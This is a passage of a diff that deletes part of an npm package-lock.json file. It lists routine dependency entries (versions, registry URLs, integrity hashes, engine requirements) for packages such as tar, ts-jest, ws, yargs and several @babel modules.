"https://github.com/sponsors/isaacs" - } - }, - "node_modules/rimraf/node_modules/brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "dependencies": { - "balanced-match": "^1.0.0" - } - }, - "node_modules/rimraf/node_modules/glob": { - "version": "10.4.5", - "resolved": "https://registry.npmjs.org/glob/-/glob-10.4.5.tgz", - "integrity": "sha512-7Bv8RF0k6xjo7d4A/PxYLbUCfb6c+Vpd2/mB2yRDlew7Jb5hEXiCD9ibfO7wpk8i4sevK6DFny9h7EYbM3/sHg==", - "dependencies": { - "foreground-child": "^3.1.0", - "jackspeak": "^3.1.2", - "minimatch": "^9.0.4", - "minipass": "^7.1.2", - "package-json-from-dist": "^1.0.0", - "path-scurry": "^1.11.1" - }, - "bin": { - "glob": "dist/esm/bin.mjs" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/rimraf/node_modules/minimatch": { - "version": "9.0.5", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", - "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", - "dependencies": { - "brace-expansion": "^2.0.1" - }, - "engines": { - "node": ">=16 || 14 >=14.17" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/safe-buffer": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", - "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" - }, - "node_modules/safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" - }, - "node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "node_modules/sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "node_modules/slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "dependencies": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "node_modules/sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "node_modules/sshpk": { - "version": "1.17.0", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.17.0.tgz", - "integrity": "sha512-/9HIEs1ZXGhSPE8X6Ccm7Nam1z8KcoCqPdI7ecm1N33EzAetWahvQWVqLZtaZQ+IDKX4IyA2o0gBzqIMkAagHQ==", - "dependencies": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - }, - "bin": { - "sshpk-conv": "bin/sshpk-conv", - "sshpk-sign": "bin/sshpk-sign", - "sshpk-verify": "bin/sshpk-verify" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "dependencies": { - "escape-string-regexp": "^2.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", - "engines": { - "node": ">= 0.10.0" - } - }, - "node_modules/string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "dependencies": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/string-width-cjs": { - "name": "string-width", - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi-cjs": { - "name": "strip-ansi", - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/tar": { - "version": "7.4.3", - "resolved": "https://registry.npmjs.org/tar/-/tar-7.4.3.tgz", - "integrity": "sha512-5S7Va8hKfV7W5U6g3aYxXmlPoZVAwUMy9AOKyF2fVuZa2UD3qZjg578OrLRt8PcNN1PleVaL/5/yYATNL0ICUw==", - "dependencies": { - "@isaacs/fs-minipass": "^4.0.0", - "chownr": "^3.0.0", - "minipass": "^7.1.2", - "minizlib": "^3.0.1", - "mkdirp": "^3.0.1", - "yallist": "^5.0.0" - }, - "engines": { - "node": ">=18" - } - }, - "node_modules/tar/node_modules/yallist": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-5.0.0.tgz", - "integrity": "sha512-YgvUTfwqyc7UXVMrB+SImsVYSmTS8X/tSrtdNZMImM+n7+QTriRXyXim0mBrTXNeqzVF0KWGgHPeiyViFFrNDw==", - "engines": { - "node": ">=18" - } - }, - "node_modules/test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "dependencies": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "node_modules/to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "dependencies": { - "is-number": "^7.0.0" - }, - "engines": { - "node": ">=8.0" - } - }, - "node_modules/tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "dependencies": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - }, - "engines": { - "node": ">=0.8" - } - }, - "node_modules/ts-jest": { - "version": "29.2.5", - "resolved": "https://registry.npmjs.org/ts-jest/-/ts-jest-29.2.5.tgz", - "integrity": "sha512-KD8zB2aAZrcKIdGk4OwpJggeLcH1FgrICqDSROWqlnJXGCXK4Mn6FcdK2B6670Xr73lHMG1kHw8R87A0ecZ+vA==", - "dev": true, - "dependencies": { - "bs-logger": "^0.2.6", - "ejs": "^3.1.10", - "fast-json-stable-stringify": "^2.1.0", - "jest-util": "^29.0.0", - "json5": "^2.2.3", - "lodash.memoize": "^4.1.2", - "make-error": "^1.3.6", - "semver": "^7.6.3", - "yargs-parser": "^21.1.1" - }, - "bin": { - "ts-jest": "cli.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || ^18.0.0 || >=20.0.0" - }, - "peerDependencies": { - "@babel/core": ">=7.0.0-beta.0 <8", - "@jest/transform": "^29.0.0", - "@jest/types": "^29.0.0", - "babel-jest": "^29.0.0", - "jest": "^29.0.0", - "typescript": ">=4.3 <6" - }, - "peerDependenciesMeta": { - "@babel/core": { - "optional": true - }, - "@jest/transform": { - "optional": true - }, - "@jest/types": { - "optional": true - }, - "babel-jest": { - "optional": true - }, - "esbuild": { - "optional": true - } - } - }, - "node_modules/ts-jest/node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/tslib": { - "version": "2.4.1", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.4.1.tgz", - "integrity": "sha512-tGyy4dAjRIEwI7BzsB0lynWgOpfqjUdq91XXAlIWD2OwKBH7oCl/GZG/HT4BOHrTlPMOASlMQ7veyTqpmRcrNA==" - }, - "node_modules/tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=", - "dependencies": { - "safe-buffer": "^5.0.1" - }, - "engines": { - "node": "*" - } - }, - "node_modules/tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q=" - }, - "node_modules/type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/typescript": { - "version": "5.7.2", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.7.2.tgz", - "integrity": "sha512-i5t66RHxDvVN40HfDd1PsEThGNnlMCMT3jMUuoh9/0TaqWevNontacunWyN02LA9/fIbEWlcHZcgTKb9QoaLfg==", - "dev": true, - "peer": true, - "bin": { - "tsc": "bin/tsc", - "tsserver": "bin/tsserver" - }, - "engines": { - "node": ">=14.17" - } - }, - "node_modules/undici-types": { - "version": "6.20.0", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.20.0.tgz", - "integrity": "sha512-Ny6QZ2Nju20vw1SRHe3d9jVu6gJ+4e3+MMpqu7pqE5HT6WsTSlce++GQmK5UXS8mzV8DSYHrQH+Xrf2jVcuKNg==", - "dev": true - }, - "node_modules/update-browserslist-db": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.1.1.tgz", - "integrity": "sha512-R8UzCaa9Az+38REPiJ1tXlImTJXlVfgHZsglwBD/k6nj76ctsH1E3q4doGrukiLQd3sGQYu56r5+lo5r94l29A==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "escalade": "^3.2.0", - "picocolors": "^1.1.0" - }, - "bin": { - "update-browserslist-db": "cli.js" - }, - "peerDependencies": { - "browserslist": ">= 4.21.0" - } - }, - "node_modules/uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "dependencies": { - "punycode": "^2.1.0" - } - }, - "node_modules/uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", - "bin": { - "uuid": "bin/uuid" - } - }, - "node_modules/v8-to-istanbul": { - "version": "9.3.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.3.0.tgz", - "integrity": "sha512-kiGUalWN+rgBJ/1OHZsBtU4rXZOfj/7rKQxULKlIzwzQSvMJUUNgPwJEEh7gU6xEVxC0ahoOBvN2YI8GH6FNgA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^2.0.0" - }, - "engines": { - "node": ">=10.12.0" - } - }, - "node_modules/verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=", - "engines": [ - "node >=0.6.0" - ], - "dependencies": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "node_modules/walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "dependencies": { - "makeerror": "1.0.12" - } - }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrap-ansi-cjs": { - "name": "wrap-ansi", - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "node_modules/write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || >=16.0.0" - } - }, - "node_modules/ws": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", - "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", - "engines": { - "node": ">=10.0.0" - }, - "peerDependencies": { - "bufferutil": "^4.0.1", - "utf-8-validate": ">=5.0.2" - }, - "peerDependenciesMeta": { - "bufferutil": { - "optional": true - }, - "utf-8-validate": { - "optional": true - } - } - }, - "node_modules/y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "dependencies": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true, - "engines": { - "node": ">=12" - } - }, - "node_modules/yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - } - }, - "dependencies": { - "@ampproject/remapping": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.3.0.tgz", - "integrity": "sha512-30iZtAPgz+LTIYoeivqYo853f02jBYSd5uGnGpkFV0M3xOt9aN73erkgYAmZU43x4VfqcnLxW9Kpg3R5LC4YYw==", - "dev": true, - "requires": { - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.24" - } - }, - "@babel/code-frame": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.26.2.tgz", - "integrity": "sha512-RJlIHRueQgwWitWgF8OdFYGZX328Ax5BCemNGlqHfplnRT9ESi8JkFlvaVYbS+UubVY6dpv87Fs2u5M29iNFVQ==", - "dev": true, - "requires": { - "@babel/helper-validator-identifier": "^7.25.9", - "js-tokens": "^4.0.0", - "picocolors": "^1.0.0" - } - }, - "@babel/compat-data": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.26.2.tgz", - "integrity": "sha512-Z0WgzSEa+aUcdiJuCIqgujCshpMWgUpgOxXotrYPSA53hA3qopNaqcJpyr0hVb1FeWdnqFA35/fUtXgBK8srQg==", - "dev": true - }, - "@babel/core": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.26.0.tgz", - "integrity": "sha512-i1SLeK+DzNnQ3LL/CswPCa/E5u4lh1k6IAEphON8F+cXt0t9euTshDru0q7/IqMa1PMPz5RnHuHscF8/ZJsStg==", - "dev": true, - "requires": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.26.0", - "@babel/generator": "^7.26.0", - "@babel/helper-compilation-targets": "^7.25.9", - "@babel/helper-module-transforms": "^7.26.0", - "@babel/helpers": "^7.26.0", - "@babel/parser": "^7.26.0", - "@babel/template": "^7.25.9", - "@babel/traverse": "^7.25.9", - "@babel/types": "^7.26.0", - "convert-source-map": "^2.0.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.3", - "semver": "^6.3.1" - } - }, - "@babel/generator": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.26.2.tgz", - "integrity": "sha512-zevQbhbau95nkoxSq3f/DC/SC+EEOUZd3DYqfSkMhY2/wfSeaHV1Ew4vk8e+x8lja31IbyuUa2uQ3JONqKbysw==", - "dev": true, - "requires": { - "@babel/parser": "^7.26.2", - "@babel/types": "^7.26.0", - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.25", - "jsesc": "^3.0.2" - } - }, - "@babel/helper-compilation-targets": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.25.9.tgz", - "integrity": "sha512-j9Db8Suy6yV/VHa4qzrj9yZfZxhLWQdVnRlXxmKLYlhWUVB1sB2G5sxuWYXk/whHD9iW76PmNzxZ4UCnTQTVEQ==", - "dev": true, - "requires": { - "@babel/compat-data": "^7.25.9", - "@babel/helper-validator-option": "^7.25.9", - "browserslist": "^4.24.0", - "lru-cache": "^5.1.1", - "semver": "^6.3.1" - }, - "dependencies": { - "lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": 